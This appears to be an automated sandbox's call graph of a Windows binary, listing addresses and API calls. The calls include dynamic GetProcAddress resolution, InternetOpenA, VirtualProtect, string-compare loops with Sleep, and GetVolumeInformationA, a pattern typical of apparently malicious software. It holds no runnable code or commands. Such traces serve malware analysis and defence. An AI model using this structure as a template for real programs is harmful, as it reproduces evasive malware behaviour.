ec1590 lstrcpy 13782->13783 13784 ed5eb5 13783->13784 15011 ed1a10 13784->15011 13786 ed5eba 13787 eda740 lstrcpy 13786->13787 13788 ed5ed6 13787->13788 15355 ec4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13788->15355 13790 ed5edb 13791 ec1590 lstrcpy 13790->13791 13792 ed5f5b 13791->13792 15362 ed0740 13792->15362 13794 ed5f60 13795 eda740 lstrcpy 13794->13795 13796 ed5f86 13795->13796 13797 ec1590 lstrcpy 13796->13797 13798 ed5f9a 13797->13798 13799 ec5960 34 API calls 13798->13799 13800 ed5fa0 13799->13800 13894 ec45d1 RtlAllocateHeap 13893->13894 13897 ec4621 VirtualProtect 13894->13897 13897->13542 13898->13629 13900 ec10c2 ctype 13899->13900 13901 ec10fd 13900->13901 13902 ec10e2 VirtualFree 13900->13902 13901->13659 13902->13901 13904 ec1233 GlobalMemoryStatusEx 13903->13904 13904->13662 13905->13686 13907 eda7c2 13906->13907 13908 eda7ec 13907->13908 13909 eda7da lstrcpy 13907->13909 13908->13691 13909->13908 13911 eda740 lstrcpy 13910->13911 13912 ed6833 13911->13912 13913 eda9b0 4 API calls 13912->13913 13914 ed6845 13913->13914 13915 eda8a0 lstrcpy 13914->13915 13916 ed684e 13915->13916 13917 eda9b0 4 API calls 13916->13917 13918 ed6867 13917->13918 13919 eda8a0 lstrcpy 13918->13919 13920 ed6870 13919->13920 13921 eda9b0 4 API calls 13920->13921 13922 ed688a 13921->13922 13923 eda8a0 lstrcpy 13922->13923 13924 ed6893 13923->13924 13925 eda9b0 4 API calls 13924->13925 13926 ed68ac 13925->13926 13927 eda8a0 lstrcpy 13926->13927 13928 ed68b5 13927->13928 13929 eda9b0 4 API calls 13928->13929 13930 ed68cf 13929->13930 13931 eda8a0 lstrcpy 13930->13931 13932 ed68d8 13931->13932 13933 eda9b0 4 API calls 13932->13933 13934 ed68f3 13933->13934 13935 eda8a0 lstrcpy 13934->13935 13936 ed68fc 13935->13936 13937 eda7a0 lstrcpy 13936->13937 13938 ed6910 13937->13938 13938->13698 13940 eda812 13939->13940 13940->13701 13942 eda83f 13941->13942 13943 ed5b54 13942->13943 13944 eda87b lstrcpy 13942->13944 13943->13711 13944->13943 13946 eda8a0 lstrcpy 13945->13946 
13947 ed6443 13946->13947 13948 eda8a0 lstrcpy 13947->13948 13949 ed6455 13948->13949 13950 eda8a0 lstrcpy 13949->13950 13951 ed6467 13950->13951 13952 eda8a0 lstrcpy 13951->13952 13953 ed5b86 13952->13953 13953->13717 13955 ec45c0 2 API calls 13954->13955 13956 ec26b4 13955->13956 13957 ec45c0 2 API calls 13956->13957 13958 ec26d7 13957->13958 13959 ec45c0 2 API calls 13958->13959 13960 ec26f0 13959->13960 13961 ec45c0 2 API calls 13960->13961 13962 ec2709 13961->13962 13963 ec45c0 2 API calls 13962->13963 13964 ec2736 13963->13964 13965 ec45c0 2 API calls 13964->13965 13966 ec274f 13965->13966 13967 ec45c0 2 API calls 13966->13967 13968 ec2768 13967->13968 13969 ec45c0 2 API calls 13968->13969 13970 ec2795 13969->13970 13971 ec45c0 2 API calls 13970->13971 13972 ec27ae 13971->13972 13973 ec45c0 2 API calls 13972->13973 13974 ec27c7 13973->13974 13975 ec45c0 2 API calls 13974->13975 13976 ec27e0 13975->13976 13977 ec45c0 2 API calls 13976->13977 13978 ec27f9 13977->13978 13979 ec45c0 2 API calls 13978->13979 13980 ec2812 13979->13980 13981 ec45c0 2 API calls 13980->13981 13982 ec282b 13981->13982 13983 ec45c0 2 API calls 13982->13983 13984 ec2844 13983->13984 13985 ec45c0 2 API calls 13984->13985 13986 ec285d 13985->13986 13987 ec45c0 2 API calls 13986->13987 13988 ec2876 13987->13988 13989 ec45c0 2 API calls 13988->13989 13990 ec288f 13989->13990 13991 ec45c0 2 API calls 13990->13991 13992 ec28a8 13991->13992 13993 ec45c0 2 API calls 13992->13993 13994 ec28c1 13993->13994 13995 ec45c0 2 API calls 13994->13995 13996 ec28da 13995->13996 13997 ec45c0 2 API calls 13996->13997 13998 ec28f3 13997->13998 13999 ec45c0 2 API calls 13998->13999 14000 ec290c 13999->14000 14001 ec45c0 2 API calls 14000->14001 14002 ec2925 14001->14002 14003 ec45c0 2 API calls 14002->14003 14004 ec293e 14003->14004 14005 ec45c0 2 API calls 14004->14005 14006 ec2957 14005->14006 14007 ec45c0 2 API calls 14006->14007 14008 ec2970 14007->14008 14009 ec45c0 2 API calls 14008->14009 14010 ec2989 
14009->14010 14011 ec45c0 2 API calls 14010->14011 14012 ec29a2 14011->14012 14013 ec45c0 2 API calls 14012->14013 14014 ec29bb 14013->14014 14015 ec45c0 2 API calls 14014->14015 14016 ec29d4 14015->14016 14017 ec45c0 2 API calls 14016->14017 14018 ec29ed 14017->14018 14019 ec45c0 2 API calls 14018->14019 14020 ec2a06 14019->14020 14021 ec45c0 2 API calls 14020->14021 14022 ec2a1f 14021->14022 14023 ec45c0 2 API calls 14022->14023 14024 ec2a38 14023->14024 14025 ec45c0 2 API calls 14024->14025 14026 ec2a51 14025->14026 14027 ec45c0 2 API calls 14026->14027 14028 ec2a6a 14027->14028 14029 ec45c0 2 API calls 14028->14029 14030 ec2a83 14029->14030 14031 ec45c0 2 API calls 14030->14031 14032 ec2a9c 14031->14032 14033 ec45c0 2 API calls 14032->14033 14034 ec2ab5 14033->14034 14035 ec45c0 2 API calls 14034->14035 14036 ec2ace 14035->14036 14037 ec45c0 2 API calls 14036->14037 14038 ec2ae7 14037->14038 14039 ec45c0 2 API calls 14038->14039 14040 ec2b00 14039->14040 14041 ec45c0 2 API calls 14040->14041 14042 ec2b19 14041->14042 14043 ec45c0 2 API calls 14042->14043 14044 ec2b32 14043->14044 14045 ec45c0 2 API calls 14044->14045 14046 ec2b4b 14045->14046 14047 ec45c0 2 API calls 14046->14047 14048 ec2b64 14047->14048 14049 ec45c0 2 API calls 14048->14049 14050 ec2b7d 14049->14050 14051 ec45c0 2 API calls 14050->14051 14052 ec2b96 14051->14052 14053 ec45c0 2 API calls 14052->14053 14054 ec2baf 14053->14054 14055 ec45c0 2 API calls 14054->14055 14056 ec2bc8 14055->14056 14057 ec45c0 2 API calls 14056->14057 14058 ec2be1 14057->14058 14059 ec45c0 2 API calls 14058->14059 14060 ec2bfa 14059->14060 14061 ec45c0 2 API calls 14060->14061 14062 ec2c13 14061->14062 14063 ec45c0 2 API calls 14062->14063 14064 ec2c2c 14063->14064 14065 ec45c0 2 API calls 14064->14065 14066 ec2c45 14065->14066 14067 ec45c0 2 API calls 14066->14067 14068 ec2c5e 14067->14068 14069 ec45c0 2 API calls 14068->14069 14070 ec2c77 14069->14070 14071 ec45c0 2 API calls 14070->14071 14072 ec2c90 14071->14072 
14073 ec45c0 2 API calls 14072->14073 14074 ec2ca9 14073->14074 14075 ec45c0 2 API calls 14074->14075 14076 ec2cc2 14075->14076 14077 ec45c0 2 API calls 14076->14077 14078 ec2cdb 14077->14078 14079 ec45c0 2 API calls 14078->14079 14080 ec2cf4 14079->14080 14081 ec45c0 2 API calls 14080->14081 14082 ec2d0d 14081->14082 14083 ec45c0 2 API calls 14082->14083 14084 ec2d26 14083->14084 14085 ec45c0 2 API calls 14084->14085 14086 ec2d3f 14085->14086 14087 ec45c0 2 API calls 14086->14087 14088 ec2d58 14087->14088 14089 ec45c0 2 API calls 14088->14089 14090 ec2d71 14089->14090 14091 ec45c0 2 API calls 14090->14091 14092 ec2d8a 14091->14092 14093 ec45c0 2 API calls 14092->14093 14094 ec2da3 14093->14094 14095 ec45c0 2 API calls 14094->14095 14096 ec2dbc 14095->14096 14097 ec45c0 2 API calls 14096->14097 14098 ec2dd5 14097->14098 14099 ec45c0 2 API calls 14098->14099 14100 ec2dee 14099->14100 14101 ec45c0 2 API calls 14100->14101 14102 ec2e07 14101->14102 14103 ec45c0 2 API calls 14102->14103 14104 ec2e20 14103->14104 14105 ec45c0 2 API calls 14104->14105 14106 ec2e39 14105->14106 14107 ec45c0 2 API calls 14106->14107 14108 ec2e52 14107->14108 14109 ec45c0 2 API calls 14108->14109 14110 ec2e6b 14109->14110 14111 ec45c0 2 API calls 14110->14111 14112 ec2e84 14111->14112 14113 ec45c0 2 API calls 14112->14113 14114 ec2e9d 14113->14114 14115 ec45c0 2 API calls 14114->14115 14116 ec2eb6 14115->14116 14117 ec45c0 2 API calls 14116->14117 14118 ec2ecf 14117->14118 14119 ec45c0 2 API calls 14118->14119 14120 ec2ee8 14119->14120 14121 ec45c0 2 API calls 14120->14121 14122 ec2f01 14121->14122 14123 ec45c0 2 API calls 14122->14123 14124 ec2f1a 14123->14124 14125 ec45c0 2 API calls 14124->14125 14126 ec2f33 14125->14126 14127 ec45c0 2 API calls 14126->14127 14128 ec2f4c 14127->14128 14129 ec45c0 2 API calls 14128->14129 14130 ec2f65 14129->14130 14131 ec45c0 2 API calls 14130->14131 14132 ec2f7e 14131->14132 14133 ec45c0 2 API calls 14132->14133 14134 ec2f97 14133->14134 14135 ec45c0 2 
API calls 14134->14135 14136 ec2fb0 14135->14136 14137 ec45c0 2 API calls 14136->14137 14138 ec2fc9 14137->14138 14139 ec45c0 2 API calls 14138->14139 14140 ec2fe2 14139->14140 14141 ec45c0 2 API calls 14140->14141 14142 ec2ffb 14141->14142 14143 ec45c0 2 API calls 14142->14143 14144 ec3014 14143->14144 14145 ec45c0 2 API calls 14144->14145 14146 ec302d 14145->14146 14147 ec45c0 2 API calls 14146->14147 14148 ec3046 14147->14148 14149 ec45c0 2 API calls 14148->14149 14150 ec305f 14149->14150 14151 ec45c0 2 API calls 14150->14151 14152 ec3078 14151->14152 14153 ec45c0 2 API calls 14152->14153 14154 ec3091 14153->14154 14155 ec45c0 2 API calls 14154->14155 14156 ec30aa 14155->14156 14157 ec45c0 2 API calls 14156->14157 14158 ec30c3 14157->14158 14159 ec45c0 2 API calls 14158->14159 14160 ec30dc 14159->14160 14161 ec45c0 2 API calls 14160->14161 14162 ec30f5 14161->14162 14163 ec45c0 2 API calls 14162->14163 14164 ec310e 14163->14164 14165 ec45c0 2 API calls 14164->14165 14166 ec3127 14165->14166 14167 ec45c0 2 API calls 14166->14167 14168 ec3140 14167->14168 14169 ec45c0 2 API calls 14168->14169 14170 ec3159 14169->14170 14171 ec45c0 2 API calls 14170->14171 14172 ec3172 14171->14172 14173 ec45c0 2 API calls 14172->14173 14174 ec318b 14173->14174 14175 ec45c0 2 API calls 14174->14175 14176 ec31a4 14175->14176 14177 ec45c0 2 API calls 14176->14177 14178 ec31bd 14177->14178 14179 ec45c0 2 API calls 14178->14179 14180 ec31d6 14179->14180 14181 ec45c0 2 API calls 14180->14181 14182 ec31ef 14181->14182 14183 ec45c0 2 API calls 14182->14183 14184 ec3208 14183->14184 14185 ec45c0 2 API calls 14184->14185 14186 ec3221 14185->14186 14187 ec45c0 2 API calls 14186->14187 14188 ec323a 14187->14188 14189 ec45c0 2 API calls 14188->14189 14190 ec3253 14189->14190 14191 ec45c0 2 API calls 14190->14191 14192 ec326c 14191->14192 14193 ec45c0 2 API calls 14192->14193 14194 ec3285 14193->14194 14195 ec45c0 2 API calls 14194->14195 14196 ec329e 14195->14196 14197 ec45c0 2 API calls 
14196->14197 14198 ec32b7 14197->14198 14199 ec45c0 2 API calls 14198->14199 14200 ec32d0 14199->14200 14201 ec45c0 2 API calls 14200->14201 14202 ec32e9 14201->14202 14203 ec45c0 2 API calls 14202->14203 14204 ec3302 14203->14204 14205 ec45c0 2 API calls 14204->14205 14206 ec331b 14205->14206 14207 ec45c0 2 API calls 14206->14207 14208 ec3334 14207->14208 14209 ec45c0 2 API calls 14208->14209 14210 ec334d 14209->14210 14211 ec45c0 2 API calls 14210->14211 14212 ec3366 14211->14212 14213 ec45c0 2 API calls 14212->14213 14214 ec337f 14213->14214 14215 ec45c0 2 API calls 14214->14215 14216 ec3398 14215->14216 14217 ec45c0 2 API calls 14216->14217 14218 ec33b1 14217->14218 14219 ec45c0 2 API calls 14218->14219 14220 ec33ca 14219->14220 14221 ec45c0 2 API calls 14220->14221 14222 ec33e3 14221->14222 14223 ec45c0 2 API calls 14222->14223 14224 ec33fc 14223->14224 14225 ec45c0 2 API calls 14224->14225 14226 ec3415 14225->14226 14227 ec45c0 2 API calls 14226->14227 14228 ec342e 14227->14228 14229 ec45c0 2 API calls 14228->14229 14230 ec3447 14229->14230 14231 ec45c0 2 API calls 14230->14231 14232 ec3460 14231->14232 14233 ec45c0 2 API calls 14232->14233 14234 ec3479 14233->14234 14235 ec45c0 2 API calls 14234->14235 14236 ec3492 14235->14236 14237 ec45c0 2 API calls 14236->14237 14238 ec34ab 14237->14238 14239 ec45c0 2 API calls 14238->14239 14240 ec34c4 14239->14240 14241 ec45c0 2 API calls 14240->14241 14242 ec34dd 14241->14242 14243 ec45c0 2 API calls 14242->14243 14244 ec34f6 14243->14244 14245 ec45c0 2 API calls 14244->14245 14246 ec350f 14245->14246 14247 ec45c0 2 API calls 14246->14247 14248 ec3528 14247->14248 14249 ec45c0 2 API calls 14248->14249 14250 ec3541 14249->14250 14251 ec45c0 2 API calls 14250->14251 14252 ec355a 14251->14252 14253 ec45c0 2 API calls 14252->14253 14254 ec3573 14253->14254 14255 ec45c0 2 API calls 14254->14255 14256 ec358c 14255->14256 14257 ec45c0 2 API calls 14256->14257 14258 ec35a5 14257->14258 14259 ec45c0 2 API calls 14258->14259 
14260 ec35be 14259->14260 14261 ec45c0 2 API calls 14260->14261 14262 ec35d7 14261->14262 14263 ec45c0 2 API calls 14262->14263 14264 ec35f0 14263->14264 14265 ec45c0 2 API calls 14264->14265 14266 ec3609 14265->14266 14267 ec45c0 2 API calls 14266->14267 14268 ec3622 14267->14268 14269 ec45c0 2 API calls 14268->14269 14270 ec363b 14269->14270 14271 ec45c0 2 API calls 14270->14271 14272 ec3654 14271->14272 14273 ec45c0 2 API calls 14272->14273 14274 ec366d 14273->14274 14275 ec45c0 2 API calls 14274->14275 14276 ec3686 14275->14276 14277 ec45c0 2 API calls 14276->14277 14278 ec369f 14277->14278 14279 ec45c0 2 API calls 14278->14279 14280 ec36b8 14279->14280 14281 ec45c0 2 API calls 14280->14281 14282 ec36d1 14281->14282 14283 ec45c0 2 API calls 14282->14283 14284 ec36ea 14283->14284 14285 ec45c0 2 API calls 14284->14285 14286 ec3703 14285->14286 14287 ec45c0 2 API calls 14286->14287 14288 ec371c 14287->14288 14289 ec45c0 2 API calls 14288->14289 14290 ec3735 14289->14290 14291 ec45c0 2 API calls 14290->14291 14292 ec374e 14291->14292 14293 ec45c0 2 API calls 14292->14293 14294 ec3767 14293->14294 14295 ec45c0 2 API calls 14294->14295 14296 ec3780 14295->14296 14297 ec45c0 2 API calls 14296->14297 14298 ec3799 14297->14298 14299 ec45c0 2 API calls 14298->14299 14300 ec37b2 14299->14300 14301 ec45c0 2 API calls 14300->14301 14302 ec37cb 14301->14302 14303 ec45c0 2 API calls 14302->14303 14304 ec37e4 14303->14304 14305 ec45c0 2 API calls 14304->14305 14306 ec37fd 14305->14306 14307 ec45c0 2 API calls 14306->14307 14308 ec3816 14307->14308 14309 ec45c0 2 API calls 14308->14309 14310 ec382f 14309->14310 14311 ec45c0 2 API calls 14310->14311 14312 ec3848 14311->14312 14313 ec45c0 2 API calls 14312->14313 14314 ec3861 14313->14314 14315 ec45c0 2 API calls 14314->14315 14316 ec387a 14315->14316 14317 ec45c0 2 API calls 14316->14317 14318 ec3893 14317->14318 14319 ec45c0 2 API calls 14318->14319 14320 ec38ac 14319->14320 14321 ec45c0 2 API calls 14320->14321 14322 ec38c5 
14321->14322 14323 ec45c0 2 API calls 14322->14323 14324 ec38de 14323->14324 14325 ec45c0 2 API calls 14324->14325 14326 ec38f7 14325->14326 14327 ec45c0 2 API calls 14326->14327 14328 ec3910 14327->14328 14329 ec45c0 2 API calls 14328->14329 14330 ec3929 14329->14330 14331 ec45c0 2 API calls 14330->14331 14332 ec3942 14331->14332 14333 ec45c0 2 API calls 14332->14333 14334 ec395b 14333->14334 14335 ec45c0 2 API calls 14334->14335 14336 ec3974 14335->14336 14337 ec45c0 2 API calls 14336->14337 14338 ec398d 14337->14338 14339 ec45c0 2 API calls 14338->14339 14340 ec39a6 14339->14340 14341 ec45c0 2 API calls 14340->14341 14342 ec39bf 14341->14342 14343 ec45c0 2 API calls 14342->14343 14344 ec39d8 14343->14344 14345 ec45c0 2 API calls 14344->14345 14346 ec39f1 14345->14346 14347 ec45c0 2 API calls 14346->14347 14348 ec3a0a 14347->14348 14349 ec45c0 2 API calls 14348->14349 14350 ec3a23 14349->14350 14351 ec45c0 2 API calls 14350->14351 14352 ec3a3c 14351->14352 14353 ec45c0 2 API calls 14352->14353 14354 ec3a55 14353->14354 14355 ec45c0 2 API calls 14354->14355 14356 ec3a6e 14355->14356 14357 ec45c0 2 API calls 14356->14357 14358 ec3a87 14357->14358 14359 ec45c0 2 API calls 14358->14359 14360 ec3aa0 14359->14360 14361 ec45c0 2 API calls 14360->14361 14362 ec3ab9 14361->14362 14363 ec45c0 2 API calls 14362->14363 14364 ec3ad2 14363->14364 14365 ec45c0 2 API calls 14364->14365 14366 ec3aeb 14365->14366 14367 ec45c0 2 API calls 14366->14367 14368 ec3b04 14367->14368 14369 ec45c0 2 API calls 14368->14369 14370 ec3b1d 14369->14370 14371 ec45c0 2 API calls 14370->14371 14372 ec3b36 14371->14372 14373 ec45c0 2 API calls 14372->14373 14374 ec3b4f 14373->14374 14375 ec45c0 2 API calls 14374->14375 14376 ec3b68 14375->14376 14377 ec45c0 2 API calls 14376->14377 14378 ec3b81 14377->14378 14379 ec45c0 2 API calls 14378->14379 14380 ec3b9a 14379->14380 14381 ec45c0 2 API calls 14380->14381 14382 ec3bb3 14381->14382 14383 ec45c0 2 API calls 14382->14383 14384 ec3bcc 14383->14384 
14385 ec45c0 2 API calls 14384->14385 14386 ec3be5 14385->14386 14387 ec45c0 2 API calls 14386->14387 14388 ec3bfe 14387->14388 14389 ec45c0 2 API calls 14388->14389 14390 ec3c17 14389->14390 14391 ec45c0 2 API calls 14390->14391 14392 ec3c30 14391->14392 14393 ec45c0 2 API calls 14392->14393 14394 ec3c49 14393->14394 14395 ec45c0 2 API calls 14394->14395 14396 ec3c62 14395->14396 14397 ec45c0 2 API calls 14396->14397 14398 ec3c7b 14397->14398 14399 ec45c0 2 API calls 14398->14399 14400 ec3c94 14399->14400 14401 ec45c0 2 API calls 14400->14401 14402 ec3cad 14401->14402 14403 ec45c0 2 API calls 14402->14403 14404 ec3cc6 14403->14404 14405 ec45c0 2 API calls 14404->14405 14406 ec3cdf 14405->14406 14407 ec45c0 2 API calls 14406->14407 14408 ec3cf8 14407->14408 14409 ec45c0 2 API calls 14408->14409 14410 ec3d11 14409->14410 14411 ec45c0 2 API calls 14410->14411 14412 ec3d2a 14411->14412 14413 ec45c0 2 API calls 14412->14413 14414 ec3d43 14413->14414 14415 ec45c0 2 API calls 14414->14415 14416 ec3d5c 14415->14416 14417 ec45c0 2 API calls 14416->14417 14418 ec3d75 14417->14418 14419 ec45c0 2 API calls 14418->14419 14420 ec3d8e 14419->14420 14421 ec45c0 2 API calls 14420->14421 14422 ec3da7 14421->14422 14423 ec45c0 2 API calls 14422->14423 14424 ec3dc0 14423->14424 14425 ec45c0 2 API calls 14424->14425 14426 ec3dd9 14425->14426 14427 ec45c0 2 API calls 14426->14427 14428 ec3df2 14427->14428 14429 ec45c0 2 API calls 14428->14429 14430 ec3e0b 14429->14430 14431 ec45c0 2 API calls 14430->14431 14432 ec3e24 14431->14432 14433 ec45c0 2 API calls 14432->14433 14434 ec3e3d 14433->14434 14435 ec45c0 2 API calls 14434->14435 14436 ec3e56 14435->14436 14437 ec45c0 2 API calls 14436->14437 14438 ec3e6f 14437->14438 14439 ec45c0 2 API calls 14438->14439 14440 ec3e88 14439->14440 14441 ec45c0 2 API calls 14440->14441 14442 ec3ea1 14441->14442 14443 ec45c0 2 API calls 14442->14443 14444 ec3eba 14443->14444 14445 ec45c0 2 API calls 14444->14445 14446 ec3ed3 14445->14446 14447 ec45c0 2 
API calls 14446->14447 14448 ec3eec 14447->14448 14449 ec45c0 2 API calls 14448->14449 14450 ec3f05 14449->14450 14451 ec45c0 2 API calls 14450->14451 14452 ec3f1e 14451->14452 14453 ec45c0 2 API calls 14452->14453 14454 ec3f37 14453->14454 14455 ec45c0 2 API calls 14454->14455 14456 ec3f50 14455->14456 14457 ec45c0 2 API calls 14456->14457 14458 ec3f69 14457->14458 14459 ec45c0 2 API calls 14458->14459 14460 ec3f82 14459->14460 14461 ec45c0 2 API calls 14460->14461 14462 ec3f9b 14461->14462 14463 ec45c0 2 API calls 14462->14463 14464 ec3fb4 14463->14464 14465 ec45c0 2 API calls 14464->14465 14466 ec3fcd 14465->14466 14467 ec45c0 2 API calls 14466->14467 14468 ec3fe6 14467->14468 14469 ec45c0 2 API calls 14468->14469 14470 ec3fff 14469->14470 14471 ec45c0 2 API calls 14470->14471 14472 ec4018 14471->14472 14473 ec45c0 2 API calls 14472->14473 14474 ec4031 14473->14474 14475 ec45c0 2 API calls 14474->14475 14476 ec404a 14475->14476 14477 ec45c0 2 API calls 14476->14477 14478 ec4063 14477->14478 14479 ec45c0 2 API calls 14478->14479 14480 ec407c 14479->14480 14481 ec45c0 2 API calls 14480->14481 14482 ec4095 14481->14482 14483 ec45c0 2 API calls 14482->14483 14484 ec40ae 14483->14484 14485 ec45c0 2 API calls 14484->14485 14486 ec40c7 14485->14486 14487 ec45c0 2 API calls 14486->14487 14488 ec40e0 14487->14488 14489 ec45c0 2 API calls 14488->14489 14490 ec40f9 14489->14490 14491 ec45c0 2 API calls 14490->14491 14492 ec4112 14491->14492 14493 ec45c0 2 API calls 14492->14493 14494 ec412b 14493->14494 14495 ec45c0 2 API calls 14494->14495 14496 ec4144 14495->14496 14497 ec45c0 2 API calls 14496->14497 14498 ec415d 14497->14498 14499 ec45c0 2 API calls 14498->14499 14500 ec4176 14499->14500 14501 ec45c0 2 API calls 14500->14501 14502 ec418f 14501->14502 14503 ec45c0 2 API calls 14502->14503 14504 ec41a8 14503->14504 14505 ec45c0 2 API calls 14504->14505 14506 ec41c1 14505->14506 14507 ec45c0 2 API calls 14506->14507 14508 ec41da 14507->14508 14509 ec45c0 2 API calls 
14508->14509 14510 ec41f3 14509->14510 14511 ec45c0 2 API calls 14510->14511 14512 ec420c 14511->14512 14513 ec45c0 2 API calls 14512->14513 14514 ec4225 14513->14514 14515 ec45c0 2 API calls 14514->14515 14516 ec423e 14515->14516 14517 ec45c0 2 API calls 14516->14517 14518 ec4257 14517->14518 14519 ec45c0 2 API calls 14518->14519 14520 ec4270 14519->14520 14521 ec45c0 2 API calls 14520->14521 14522 ec4289 14521->14522 14523 ec45c0 2 API calls 14522->14523 14524 ec42a2 14523->14524 14525 ec45c0 2 API calls 14524->14525 14526 ec42bb 14525->14526 14527 ec45c0 2 API calls 14526->14527 14528 ec42d4 14527->14528 14529 ec45c0 2 API calls 14528->14529 14530 ec42ed 14529->14530 14531 ec45c0 2 API calls 14530->14531 14532 ec4306 14531->14532 14533 ec45c0 2 API calls 14532->14533 14534 ec431f 14533->14534 14535 ec45c0 2 API calls 14534->14535 14536 ec4338 14535->14536 14537 ec45c0 2 API calls 14536->14537 14538 ec4351 14537->14538 14539 ec45c0 2 API calls 14538->14539 14540 ec436a 14539->14540 14541 ec45c0 2 API calls 14540->14541 14542 ec4383 14541->14542 14543 ec45c0 2 API calls 14542->14543 14544 ec439c 14543->14544 14545 ec45c0 2 API calls 14544->14545 14546 ec43b5 14545->14546 14547 ec45c0 2 API calls 14546->14547 14548 ec43ce 14547->14548 14549 ec45c0 2 API calls 14548->14549 14550 ec43e7 14549->14550 14551 ec45c0 2 API calls 14550->14551 14552 ec4400 14551->14552 14553 ec45c0 2 API calls 14552->14553 14554 ec4419 14553->14554 14555 ec45c0 2 API calls 14554->14555 14556 ec4432 14555->14556 14557 ec45c0 2 API calls 14556->14557 14558 ec444b 14557->14558 14559 ec45c0 2 API calls 14558->14559 14560 ec4464 14559->14560 14561 ec45c0 2 API calls 14560->14561 14562 ec447d 14561->14562 14563 ec45c0 2 API calls 14562->14563 14564 ec4496 14563->14564 14565 ec45c0 2 API calls 14564->14565 14566 ec44af 14565->14566 14567 ec45c0 2 API calls 14566->14567 14568 ec44c8 14567->14568 14569 ec45c0 2 API calls 14568->14569 14570 ec44e1 14569->14570 14571 ec45c0 2 API calls 14570->14571 
14572 ec44fa 14571->14572 14573 ec45c0 2 API calls 14572->14573 14574 ec4513 14573->14574 14575 ec45c0 2 API calls 14574->14575 14576 ec452c 14575->14576 14577 ec45c0 2 API calls 14576->14577 14578 ec4545 14577->14578 14579 ec45c0 2 API calls 14578->14579 14580 ec455e 14579->14580 14581 ec45c0 2 API calls 14580->14581 14582 ec4577 14581->14582 14583 ec45c0 2 API calls 14582->14583 14584 ec4590 14583->14584 14585 ec45c0 2 API calls 14584->14585 14586 ec45a9 14585->14586 14587 ed9c10 14586->14587 14588 eda036 8 API calls 14587->14588 14589 ed9c20 43 API calls 14587->14589 14590 eda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14588->14590 14591 eda146 14588->14591 14589->14588 14590->14591 14592 eda216 14591->14592 14593 eda153 8 API calls 14591->14593 14594 eda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 eda298 14592->14595 14593->14592 14594->14595 14596 eda2a5 6 API calls 14595->14596 14597 eda337 14595->14597 14596->14597 14598 eda41f 14597->14598 14599 eda344 9 API calls 14597->14599 14600 eda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14600 14601 eda4a2 14598->14601 14599->14598 14600->14601 14602 eda4dc 14601->14602 14603 eda4ab GetProcAddress GetProcAddress 14601->14603 14604 eda515 14602->14604 14605 eda4e5 GetProcAddress GetProcAddress 14602->14605 14603->14602 14606 eda612 14604->14606 14607 eda522 10 API calls 14604->14607 14605->14604 14608 eda67d 14606->14608 14609 eda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14606->14609 14607->14606 14610 eda69e 14608->14610 14611 eda686 GetProcAddress 14608->14611 14609->14608 14612 ed5ca3 14610->14612 14613 eda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14610->14613 14611->14610 14614 ec1590 14612->14614 14613->14612 15733 ec1670 14614->15733 14617 eda7a0 lstrcpy 14618 ec15b5 14617->14618 14619 eda7a0 lstrcpy 14618->14619 14620 ec15c7 14619->14620 
14621 eda7a0 lstrcpy 14620->14621 14622 ec15d9 14621->14622 14623 eda7a0 lstrcpy 14622->14623 14624 ec1663 14623->14624 14625 ed5510 14624->14625 14626 ed5521 14625->14626 14627 eda820 2 API calls 14626->14627 14628 ed552e 14627->14628 14629 eda820 2 API calls 14628->14629 14630 ed553b 14629->14630 14631 eda820 2 API calls 14630->14631 14632 ed5548 14631->14632 14633 eda740 lstrcpy 14632->14633 14634 ed5555 14633->14634 14635 eda740 lstrcpy 14634->14635 14636 ed5562 14635->14636 14637 eda740 lstrcpy 14636->14637 14638 ed556f 14637->14638 14639 eda740 lstrcpy 14638->14639 14652 ed557c 14639->14652 14640 eda820 lstrlen lstrcpy 14640->14652 14641 eda740 lstrcpy 14641->14652 14642 eda8a0 lstrcpy 14642->14652 14643 ed5643 StrCmpCA 14643->14652 14644 ed56a0 StrCmpCA 14645 ed57dc 14644->14645 14644->14652 14647 eda8a0 lstrcpy 14645->14647 14646 eda7a0 lstrcpy 14646->14652 14648 ed57e8 14647->14648 14649 eda820 2 API calls 14648->14649 14650 ed57f6 14649->14650 14653 eda820 2 API calls 14650->14653 14651 ed5856 StrCmpCA 14651->14652 14654 ed5991 14651->14654 14652->14640 14652->14641 14652->14642 14652->14643 14652->14644 14652->14646 14652->14651 14660 ed51f0 20 API calls 14652->14660 14662 ed5a0b StrCmpCA 14652->14662 14663 ed52c0 25 API calls 14652->14663 14675 ed578a StrCmpCA 14652->14675 14678 ed593f StrCmpCA 14652->14678 14679 ec1590 lstrcpy 14652->14679 14656 ed5805 14653->14656 14655 eda8a0 lstrcpy 14654->14655 14657 ed599d 14655->14657 14658 ec1670 lstrcpy 14656->14658 14659 eda820 2 API calls 14657->14659 14677 ed5811 14658->14677 14661 ed59ab 14659->14661 14660->14652 14664 eda820 2 API calls 14661->14664 14665 ed5a28 14662->14665 14666 ed5a16 Sleep 14662->14666 14663->14652 14667 ed59ba 14664->14667 14668 eda8a0 lstrcpy 14665->14668 14666->14652 14669 ec1670 lstrcpy 14667->14669 14670 ed5a34 14668->14670 14669->14677 14671 eda820 2 API calls 14670->14671 14672 ed5a43 14671->14672 14673 eda820 2 API calls 14672->14673 14674 ed5a52 14673->14674 14676 ec1670 
(Tail of the call graph. The graph is rendered interactively on the original page; the node and edge identifiers are dropped here and only the API sequences they encode are kept, grouped by the function they belong to, in the order the list gives them.)
• ed7500: GetVolumeInformationA (ed7553), GetProcessHeap, RtlAllocateHeap (ed75fc), wsprintfA (ed7628), lstrcpy.
